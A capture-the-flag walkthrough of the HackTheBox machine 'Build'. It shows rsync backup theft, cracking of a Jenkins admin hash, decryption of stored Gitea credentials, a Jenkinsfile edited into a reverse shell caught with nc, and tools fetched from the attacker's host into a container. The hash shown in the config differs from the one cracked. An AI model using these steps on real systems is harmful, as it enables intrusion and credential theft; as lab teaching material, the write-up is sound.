HTB: Build
Build starts with a Jenkins backup on an rsync server. I’ll download and decrypt a password to get access to a Gitea instance. I’ll update a Jenkins pipeline and get execution in a Docker container I’ll find PowerDNS-Admin running in another container, and on gaining access to that, set my host to have a hostname that’s allowed to authenticate using rlogin without a password, providing root access.
Box Info
| Name | Build  Play on HackTheBox |
|---|---|
| Release Date | 05 Aug 2025 |
| Retire Date | 05 Aug 2025 |
| OS | Linux  |
| Base Points | Medium [30] |
 |
N/A (non-competitive) |
 |
N/A (non-competitive) |
| Creator |  |
Recon
Initial Scanning
nmap finds seven open TCP ports, SSH (22), DNS (53), rsync (873), HTTP (3000), and three Berkeley r-commands (512-514):
oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.234.169
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-29 20:07 UTC
...[snip]...
Completed SYN Stealth Scan at 20:07, 6.65s elapsed (65535 total ports)
Nmap scan report for 10.129.234.169
Host is up, received echo-reply ttl 63 (0.092s latency).
Scanned at 2025-07-29 20:07:34 UTC for 7s
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
53/tcp open domain syn-ack ttl 62
512/tcp open exec syn-ack ttl 63
513/tcp open login syn-ack ttl 63
514/tcp open shell syn-ack ttl 63
873/tcp open rsync syn-ack ttl 63
3000/tcp open ppp syn-ack ttl 62
3306/tcp filtered mysql no-response
8081/tcp filtered blackice-icecap no-response
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.88 seconds
Raw packets sent: 65582 (2.886MB) | Rcvd: 65573 (2.623MB)
oxdf@hacky$ nmap -p 22,53,512,513,514,873,3000 -sCV 10.129.234.169
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-29 20:13 UTC
Nmap scan report for 10.129.234.169
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 47:21:73:e2:6b:96:cd:f9:13:11:af:40:c8:4d:d6:7f (ECDSA)
|_ 256 2b:5e:ba:f3:72:d3:b3:09:df:25:41:29:09:f4:7b:f5 (ED25519)
53/tcp open domain PowerDNS
| dns-nsid:
| NSID: pdns (70646e73)
|_ id.server: pdns
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
873/tcp open rsync (protocol version 31)
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=85eae5b274a8b5a7; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=QH-D-H2C9h1uu87K81WCjR4gDE86MTc1MzgyMDk3NTM0NDAyNDMwMw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 29 Jul 2025 20:29:35 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Gitea: Git with a cup of tea</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2J1aWxkLnZsOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9idWlsZC52bDozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=bca0955b853ad2f0; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=JS8XxYtWklYil4EHg0TQPVWI4d06MTc1MzgyMDk4MTQ0MTU4OTE1Ng; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 29 Jul 2025 20:29:41 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%I=7%D=7/29%Time=68892B5A%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(GetRequest,2A60,"HTTP/1\.0\x20200\x20OK\r\nCache-Contr
SF:ol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nCo
SF:ntent-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_git
SF:ea=85eae5b274a8b5a7;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Coo
SF:kie:\x20_csrf=QH-D-H2C9h1uu87K81WCjR4gDE86MTc1MzgyMDk3NTM0NDAyNDMwMw;\x
SF:20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Opt
SF:ions:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2029\x20Jul\x202025\x2020:29:35\x
SF:20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"the
SF:me-auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=dev
SF:ice-width,\x20initial-scale=1\">\n\t<title>Gitea:\x20Git\x20with\x20a\x
SF:20cup\x20of\x20tea</title>\n\t<link\x20rel=\"manifest\"\x20href=\"data:
SF:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHR
SF:lYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3Rhcn
SF:RfdXJsIjoiaHR0cDovL2J1aWxkLnZsOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6L
SF:y9idWlsZC52bDozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5n
SF:Iiwic2l6ZXMiOiI1MTJ")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,197,"HTTP/1\.0\x20405\x20Me
SF:thod\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Cont
SF:rol:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nS
SF:et-Cookie:\x20i_like_gitea=bca0955b853ad2f0;\x20Path=/;\x20HttpOnly;\x2
SF:0SameSite=Lax\r\nSet-Cookie:\x20_csrf=JS8XxYtWklYil4EHg0TQPVWI4d06MTc1M
SF:zgyMDk4MTQ0MTU4OTE1Ng;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20Sam
SF:eSite=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Tue,\x2029\x20J
SF:ul\x202025\x2020:29:41\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPR
SF:equest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.06 seconds
Based on the OpenSSH version version, the host is likely running Ubuntu 22.40 jammy [LTS] (though it could also be 22.10 kinetic).
Two ports show up as filtered (3306 typically MySQL and 8081 likely a webserver of some kind).
Two ports (DNS and HTTP) show a TTL of 62, one less than the expected TTL of 63 for a Linux host one hop away. lft confirms this:
oxdf@hacky$ sudo lft 10.129.234.169:22
Tracing ......T
TTL LFT trace to 10.129.234.169:22/tcp
1 10.10.14.1 91.9ms
2 [target open] 10.129.234.169:22 92.0ms
oxdf@hacky$ sudo lft 10.129.234.169:53
Tracing ......T
TTL LFT trace to 10.129.234.169:53/tcp
1 10.10.14.1 92.0ms
2 10.129.234.169 92.1ms
3 [target open] 10.129.234.169:53 92.1ms
oxdf@hacky$ sudo lft 10.129.234.169:3000
Tracing ......T
TTL LFT trace to 10.129.234.169:3000/tcp
1 10.10.14.1 92.1ms
2 10.129.234.169 92.0ms
3 [target open] 10.129.234.169:3000 92.1ms
That implies these services are running in a nested VM or container.
Gitea - TCP 3000
Site
This webserver is an instance of Gitea:
Under “Explore” there’s one public repo, buildadm/dev:
It has a single file, Jenkinsfile:
pipeline {
agent any
stages {
stage('Do nothing') {
steps {
sh '/bin/true'
}
}
}
}
That file has the same structure as the Pipeline I used in Builder.
I’m able to register, but that doesn’t display any additional repos or people.
Tech Stack
The footer shows that this is Gitea version 1.21.11:
Nothing else too interesting here, and no need to directory brute force as it’s known software.
rsync - TCP 873
I’ll list the directories available over rsync (similar to what I showed in Zetta and Unbalanced):
oxdf@hacky$ rsync --list-only -a rsync://10.129.234.169
backups backups
There’s a single directory named backups with the comment “backups”. It has a single tar archive:
oxdf@hacky$ rsync --list-only -a rsync://10.129.234.169/backups
drwxr-xr-x 4,096 2024/05/02 13:26:31 .
-rw-r--r-- 376,289,280 2024/05/02 13:26:19 jenkins.tar.gz
I’ll grab it, which takes a minute as it’s very large (almost 360MB):
oxdf@hacky$ rsync -a rsync://10.129.234.169/backups/jenkins.tar.gz .
Jenkins Backup
Unpack
I’ll extract the files from the Jenkins backup archive:
oxdf@hacky$ tar xf jenkins.tar.gz
oxdf@hacky$ ls jenkins_configuration/
caches
com.cloudbees.hudson.plugins.folder.config.AbstractFolderConfiguration.xml
config.xml
copy_reference_file.log
fingerprints
hudson.model.UpdateCenter.xml
hudson.plugins.build_timeout.global.GlobalTimeOutConfiguration.xml
hudson.plugins.build_timeout.operations.BuildStepOperation.xml
hudson.plugins.git.GitSCM.xml
hudson.plugins.git.GitTool.xml
hudson.plugins.timestamper.TimestamperConfig.xml
hudson.tasks.Mailer.xml
hudson.tasks.Shell.xml
hudson.triggers.SCMTrigger.xml
identity.key.enc
io.jenkins.plugins.junit.storage.JunitTestResultStorageConfiguration.xml
jenkins.fingerprints.GlobalFingerprintConfiguration.xml
jenkins.install.InstallUtil.lastExecVersion
jenkins.install.UpgradeWizard.state
jenkins.model.ArtifactManagerConfiguration.xml
jenkins.model.GlobalBuildDiscarderConfiguration.xml
jenkins.model.JenkinsLocationConfiguration.xml
jenkins.security.ResourceDomainConfiguration.xml
jenkins.tasks.filters.EnvVarsFilterGlobalConfiguration.xml
jenkins.telemetry.Correlator.xml
jobs
logs
nodeMonitors.xml
nodes
org.jenkinsci.plugin.gitea.servers.GiteaServers.xml
org.jenkinsci.plugins.displayurlapi.DefaultDisplayURLProviderGlobalConfiguration.xml
org.jenkinsci.plugins.workflow.flow.FlowExecutionList.xml
org.jenkinsci.plugins.workflow.flow.GlobalDefaultFlowDurabilityLevel.xml
org.jenkinsci.plugins.workflow.libs.GlobalLibraries.xml
plugins
queue.xml.bak
secret.key
secret.key.not-so-secret
secrets
updates
userContent
users
war
workspace
There’s a lot here.
Domains
I’ll search for and .vl domain strings in the data:
oxdf@hacky$ grep -r '\.vl' jenkins_configuration/
jenkins_configuration/jobs/build/state.xml: <avatar>http://build.vl:3000/avatar/204239236134d8e6eb156992dd11c53e</avatar>
grep: jenkins_configuration/plugins/git-client/WEB-INF/lib/JavaEWAH-1.2.3.jar: binary file matches
grep: jenkins_configuration/plugins/git-client/WEB-INF/lib/org.eclipse.jgit-6.9.0.202403050737-r.jar: binary file matches
grep: jenkins_configuration/plugins/trilead-api/WEB-INF/lib/eddsa-0.3.0.jar: binary file matches
grep: jenkins_configuration/plugins/gradle.jpi: binary file matches
grep: jenkins_configuration/plugins/mina-sshd-api-common.jpi: binary file matches
grep: jenkins_configuration/plugins/ldap.jpi: binary file matches
grep: jenkins_configuration/plugins/caffeine-api/WEB-INF/lib/caffeine-3.1.8.jar: binary file matches
grep: jenkins_configuration/plugins/gradle/WEB-INF/lib/gradle-2.11.jar: binary file matches
grep: jenkins_configuration/plugins/trilead-api.jpi: binary file matches
grep: jenkins_configuration/plugins/gitea/WEB-INF/lib/gitea.jar: binary file matches
grep: jenkins_configuration/war/WEB-INF/lib/guava-33.0.0-jre.jar: binary file matches
grep: jenkins_configuration/war/WEB-INF/lib/groovy-all-2.4.21.jar: binary file matches
grep: jenkins_configuration/war/WEB-INF/detached-plugins/plugin-util-api.hpi: binary file matches
grep: jenkins_configuration/war/WEB-INF/detached-plugins/echarts-api.hpi: binary file matches
jenkins_configuration/jenkins.model.JenkinsLocationConfiguration.xml: <jenkinsUrl>http://build.vl:5000/</jenkinsUrl>
jenkins_configuration/org.jenkinsci.plugin.gitea.servers.GiteaServers.xml: <displayName>gitea.build.vl</displayName>
jenkins_configuration/users/admin_8569439066427679502/config.xml: <emailAddress>admin@build.vl</emailAddress>
It seems the server uses build.vl, and Gitea may even use gitea.build.vl. The admin’s email is admin@build.vl.
I could take this domain and try to brute force subdomains on the webserver or on DNS, but I won’t need to.
Users
The users/users.xml file has the users for Jenkins:
oxdf@hacky$ cat users/users.xml
<?xml version='1.1' encoding='UTF-8'?>
<hudson.model.UserIdMapper>
<version>1</version>
<idToDirectoryNameMap class="concurrent-hash-map">
<entry>
<string>admin</string>
<string>admin_8569439066427679502</string>
</entry>
</idToDirectoryNameMap>
</hudson.model.UserIdMapper>
There’s one user admin, with a directory name admin_8569439066427679502. admin’s configuration is stored at users/admin_8569439066427679502/config.xml, and includes a password hash:
<?xml version='1.1' encoding='UTF-8'?>
<user>
<version>10</version>
<id>admin</id>
<fullName>admin</fullName>
<properties>
<jenkins.console.ConsoleUrlProviderUserProperty/>
<com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@1337.v60b_d7b_c7b_c9f">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>
</com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
<hudson.model.MyViewsProperty>
<views>
<hudson.model.AllView>
<owner class="hudson.model.MyViewsProperty" reference="../../.."/>
<name>all</name>
<filterExecutors>false</filterExecutors>
<filterQueue>false</filterQueue>
<properties class="hudson.model.View$PropertyList"/>
</hudson.model.AllView>
</views>
</hudson.model.MyViewsProperty>
<org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.204.vf6fddd8a_8b_e9">
<providerId>default</providerId>
</org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
<hudson.model.PaneStatusProperties>
<collapsed/>
</hudson.model.PaneStatusProperties>
<jenkins.security.seed.UserSeedProperty>
<seed>5a9e1f21231c806b</seed>
</jenkins.security.seed.UserSeedProperty>
<hudson.search.UserSearchProperty>
<insensitiveSearch>true</insensitiveSearch>
</hudson.search.UserSearchProperty>
<io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>
<hudson.model.TimeZoneProperty/>
<jenkins.model.experimentalflags.UserExperimentalFlagsProperty>
<flags/>
</jenkins.model.experimentalflags.UserExperimentalFlagsProperty>
<hudson.security.HudsonPrivateSecurityRealm_-Details>
<passwordHash>#jbcrypt:$2a$10$PaXdGyit8MLC9CEPjgw15.6x0GOIZNAk2gYUTdaOB6NN/9CPcvYrG</passwordHash>
</hudson.security.HudsonPrivateSecurityRealm_-Details>
<hudson.tasks.Mailer_-UserProperty plugin="mailer@472.vf7c289a_4b_420">
<emailAddress>admin@build.vl</emailAddress>
</hudson.tasks.Mailer_-UserProperty>
<jenkins.security.ApiTokenProperty>
<tokenStore>
<tokenList/>
</tokenStore>
</jenkins.security.ApiTokenProperty>
</properties>
</user>
I’ll throw this into hashcat with mode 3200 (just like in Builder) and it cracks to “princess”:
$ hashcat admin.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt -m 3200
hashcat (v6.2.6) starting
...[snip]...
$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a:princess
...[snip]...
I’ll try this password with both admin and buildadm over SSH, but it doesn’t work.
Config
The build config is stored at jobs/build/config.xml. It’s a long file:
<?xml version='1.1' encoding='UTF-8'?>
<jenkins.branch.OrganizationFolder plugin="branch-api@2.1163.va_f1064e4a_a_f3">
<actions/>
<description>dev</description>
<displayName>dev</displayName>
<properties>
<jenkins.branch.OrganizationChildHealthMetricsProperty>
<templates>
<com.cloudbees.hudson.plugins.folder.health.WorstChildHealthMetric plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
<nonRecursive>false</nonRecursive>
</com.cloudbees.hudson.plugins.folder.health.WorstChildHealthMetric>
</templates>
</jenkins.branch.OrganizationChildHealthMetricsProperty>
<jenkins.branch.OrganizationChildOrphanedItemsProperty>
<strategy class="jenkins.branch.OrganizationChildOrphanedItemsProperty$Inherit"/>
</jenkins.branch.OrganizationChildOrphanedItemsProperty>
<jenkins.branch.OrganizationChildTriggersProperty>
<templates>
<com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
<spec>H H/4 * * *</spec>
<interval>86400000</interval>
</com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger>
</templates>
</jenkins.branch.OrganizationChildTriggersProperty>
<com.cloudbees.hudson.plugins.folder.properties.FolderCredentialsProvider_-FolderCredentialsProperty plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain plugin="credentials@1337.v60b_d7b_c7b_c9f">
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl plugin="credentials@1337.v60b_d7b_c7b_c9f">
<id>e4048737-7acd-46fd-86ef-a3db45683d4f</id>
<description></description>
<username>buildadm</username>
<password>{AQAAABAAAAAQUNBJaKiUQNaRbPI0/VMwB1cmhU/EHt0chpFEMRLZ9v0=}</password>
<usernameSecret>false</usernameSecret>
</com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.hudson.plugins.folder.properties.FolderCredentialsProvider_-FolderCredentialsProperty>
<jenkins.branch.NoTriggerOrganizationFolderProperty>
<branches>.*</branches>
<strategy>NONE</strategy>
</jenkins.branch.NoTriggerOrganizationFolderProperty>
</properties>
<folderViews class="jenkins.branch.OrganizationFolderViewHolder">
<owner reference="../.."/>
</folderViews>
<healthMetrics/>
<icon class="jenkins.branch.MetadataActionFolderIcon">
<owner class="jenkins.branch.OrganizationFolder" reference="../.."/>
</icon>
<orphanedItemStrategy class="com.cloudbees.hudson.plugins.folder.computed.DefaultOrphanedItemStrategy" plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
<pruneDeadBranches>true</pruneDeadBranches>
<daysToKeep>-1</daysToKeep>
<numToKeep>-1</numToKeep>
<abortBuilds>false</abortBuilds>
</orphanedItemStrategy>
<triggers>
<com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
<spec>* * * * *</spec>
<interval>60000</interval>
</com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger>
</triggers>
<disabled>false</disabled>
<navigators>
<org.jenkinsci.plugin.gitea.GiteaSCMNavigator plugin="gitea@1.4.7">
<serverUrl>http://172.18.0.2:3000</serverUrl>
<repoOwner>buildadm</repoOwner>
<credentialsId>e4048737-7acd-46fd-86ef-a3db45683d4f</credentialsId>
<traits>
<org.jenkinsci.plugin.gitea.BranchDiscoveryTrait>
<strategyId>1</strategyId>
</org.jenkinsci.plugin.gitea.BranchDiscoveryTrait>
<org.jenkinsci.plugin.gitea.OriginPullRequestDiscoveryTrait>
<strategyId>1</strategyId>
</org.jenkinsci.plugin.gitea.OriginPullRequestDiscoveryTrait>
<org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait>
<strategyId>1</strategyId>
<trust class="org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait$TrustContributors"/>
</org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait>
</traits>
</org.jenkinsci.plugin.gitea.GiteaSCMNavigator>
</navigators>
<projectFactories>
<org.jenkinsci.plugins.workflow.multibranch.WorkflowMultiBranchProjectFactory plugin="workflow-multibranch@773.vc4fe1378f1d5">
<scriptPath>Jenkinsfile</scriptPath>
</org.jenkinsci.plugins.workflow.multibranch.WorkflowMultiBranchProjectFactory>
</projectFactories>
<buildStrategies/>
<strategy class="jenkins.branch.DefaultBranchPropertyStrategy">
<properties class="empty-list"/>
</strategy>
</jenkins.branch.OrganizationFolder>
I’ll cover the highlights. It’s connected to a Gitea server at 172.18.0.2:3000:
<navigators>
<org.jenkinsci.plugin.gitea.GiteaSCMNavigator plugin="gitea@1.4.7">
<serverUrl>http://172.18.0.2:3000</serverUrl>
<repoOwner>buildadm</repoOwner>
<credentialsId>e4048737-7acd-46fd-86ef-a3db45683d4f</credentialsId>
<traits>
<org.jenkinsci.plugin.gitea.BranchDiscoveryTrait>
<strategyId>1</strategyId>
</org.jenkinsci.plugin.gitea.BranchDiscoveryTrait>
<org.jenkinsci.plugin.gitea.OriginPullRequestDiscoveryTrait>
<strategyId>1</strategyId>
</org.jenkinsci.plugin.gitea.OriginPullRequestDiscoveryTrait>
<org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait>
<strategyId>1</strategyId>
<trust class="org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait$TrustContributors"/>
</org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait>
</traits>
</org.jenkinsci.plugin.gitea.GiteaSCMNavigator>
</navigators>
This is almost certainly the one I’ve interacted with, and it’s likely running in a container given the default Docker IP range.
There’s a trigger every minute:
<triggers>
<com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
<spec>* * * * *</spec>
<interval>60000</interval>
</com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger>
</triggers>
When this triggers it looks for changes in repos on the server and triggers build jobs and makes sure there’s a Jenkinsfile in the repo.
This section runs that file:
<projectFactories>
<org.jenkinsci.plugins.workflow.multibranch.WorkflowMultiBranchProjectFactory plugin="workflow-multibranch@773.vc4fe1378f1d5">
<scriptPath>Jenkinsfile</scriptPath>
</org.jenkinsci.plugins.workflow.multibranch.WorkflowMultiBranchProjectFactory>
</projectFactories>
There’s a set of credentials for the buildadm user:
<com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl plugin="credentials@1337.v60b_d7b_c7b_c9f">
<id>e4048737-7acd-46fd-86ef-a3db45683d4f</id>
<description></description>
<username>buildadm</username>
<password>{AQAAABAAAAAQUNBJaKiUQNaRbPI0/VMwB1cmhU/EHt0chpFEMRLZ9v0=}</password>
<usernameSecret>false</usernameSecret>
</com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
The password is encrypted.
Decrypt Password
In Object, I used jenkins-credentials-decryptor to decrypt offline. I’ll grab the binary using the curl command from the repo README:
oxdf@hacky$ curl -L \
"https://github.com/hoto/jenkins-credentials-decryptor/releases/download/1.2.2/jenkins-credentials-decryptor_1.2.2_$(uname -s)_$(uname -m)" \
-o jenkins-credentials-decryptor
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 2348k 100 2348k 0 0 8281k 0 --:--:-- --:--:-- --:--:-- 8281k
oxdf@hacky$ chmod +x jenkins-credentials-decryptor
It needs the master key, the Hudson secret, and the config file:
oxdf@hacky$ ./jenkins-credentials-decryptor -m jenkins_configuration/secrets/master.key -s jenkins_configuration/secrets/hudson.util.Secret -c jenkins_configuration/jobs/build/config.xml
[
{
"id": "e4048737-7acd-46fd-86ef-a3db45683d4f",
"password": "Git1234!",
"username": "buildadm"
}
]
Shell as root in Container
Authenticated Gitea
The creds above do not work over SSH, but they do login to Gitea as buildadm:
Under settings it has the email that matches what I found above:
Also in Settings there’s a webhook configured:
I’ll later see that’s the Jenkins container IP.
Shell
I’ll use the Gitea built in editor to open Jenkinsfile in the dev repo and edit the command to a bash reverse shell:
At the bottom, I’ll add a commit message and “Commit Changes”:
Within a minute there’s a connection at my listening nc:
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.129.234.169 40080
bash: cannot set terminal process group (7): Inappropriate ioctl for device
bash: no job control in this shell
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main#
I’ll upgrade my shell using the standard trick:
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main# script /dev/null -c bash
Script started, output log file is '/dev/null'.
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main# ^Z
[1]+ Stopped nc -lnvp 443
oxdf@hacky$ stty raw -echo ; fg
nc -lnvp 443
reset
reset: unknown terminal type unknown
Terminal type? screen
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main#
The shell is running as root, and user.txt is in /root:
root@5ac6c7d6fb8e:~# cat user.txt
466098e1************************
Shell as root
Enumeration
Container
The hostname is twelve hex characters, which matches the Docker default. There’s a .dockerenv file in the filesystem root:
root@5ac6c7d6fb8e:/# ls -a
. .dockerenv boot etc lib lib64 media opt root sbin sys usr
.. bin dev home lib32 libx32 mnt proc run srv tmp var
ip and ifconfig are not installed, but the IP is 172.18.0.3:
root@5ac6c7d6fb8e:/# cat /proc/net/fib_trie
Main:
+-- 0.0.0.0/0 3 0 5
|-- 0.0.0.0
/0 universe UNICAST
+-- 127.0.0.0/8 2 0 2
+-- 127.0.0.0/31 1 0 0
|-- 127.0.0.0
/8 host LOCAL
|-- 127.0.0.1
/32 host LOCAL
|-- 127.255.255.255
/32 link BROADCAST
+-- 172.18.0.0/16 2 0 2
+-- 172.18.0.0/30 2 0 2
|-- 172.18.0.0
/16 link UNICAST
|-- 172.18.0.3
/32 host LOCAL
|-- 172.18.255.255
/32 link BROADCAST
Local:
+-- 0.0.0.0/0 3 0 5
|-- 0.0.0.0
/0 universe UNICAST
+-- 127.0.0.0/8 2 0 2
+-- 127.0.0.0/31 1 0 0
|-- 127.0.0.0
/8 host LOCAL
|-- 127.0.0.1
/32 host LOCAL
|-- 127.255.255.255
/32 link BROADCAST
+-- 172.18.0.0/16 2 0 2
+-- 172.18.0.0/30 2 0 2
|-- 172.18.0.0
/16 link UNICAST
|-- 172.18.0.3
/32 host LOCAL
|-- 172.18.255.255
/32 link BROADCAST
This is different from the Gitea container, which at least the config suggested was on .2.
Container Filesystem
There’s really not much in this container. There are no user home directories in /home. /opt has a Java install and jenkins-plugin-manager.jar.
root’s home directory has a couple things to note:
root@5ac6c7d6fb8e:~# ls -la
total 20
drwxr-xr-x 3 root root 4096 May 2 2024 .
drwxr-xr-x 1 root root 4096 May 9 2024 ..
lrwxrwxrwx 1 root root 9 May 1 2024 .bash_history -> /dev/null
-r-------- 1 root root 35 May 1 2024 .rhosts
drwxr-xr-x 2 root root 4096 May 1 2024 .ssh
-rw------- 1 root root 33 Apr 15 05:26 user.txt
There’s an SSH keypair in .ssh, but I won’t find anywhere to use it:
root@5ac6c7d6fb8e:~# ls .ssh/
authorized_keys id_ed25519 id_ed25519.pub known_hosts
.rhosts configures the Berkeley r-commands, which are open from the outside:
root@5ac6c7d6fb8e:~# cat .rhosts
admin.build.vl +
intern.build.vl +
This means the computers at admin.build.vl and intern.build.vl can connect without passwords.
Network
I’ll grab a copy of a static compiled nmap and upload it to the container:
root@5ac6c7d6fb8e:~# curl 10.10.14.79/nmap -o nmap
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5805k 100 5805k 0 0 5776k 0 0:00:01 0:00:01 --:--:-- 5782k
root@5ac6c7d6fb8e:~# chmod +x nmap
I’ll also want a copy of /etc/services from my host:
root@5ac6c7d6fb8e:~# curl 10.10.14.79/services -o /etc/services
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 12813 100 12813 0 0 67475 0 --:--:-- --:--:-- --:--:-- 67793
Now I’ll scan the class C network:
root@5ac6c7d6fb8e:~# ./nmap 172.18.0.0/24 --min-rate 10000
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2025-07-29 22:19 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.18.0.1
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.000019s latency).
Not shown: 1148 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
512/tcp open exec
513/tcp open login
514/tcp open shell
873/tcp open rsync
3306/tcp open mysql
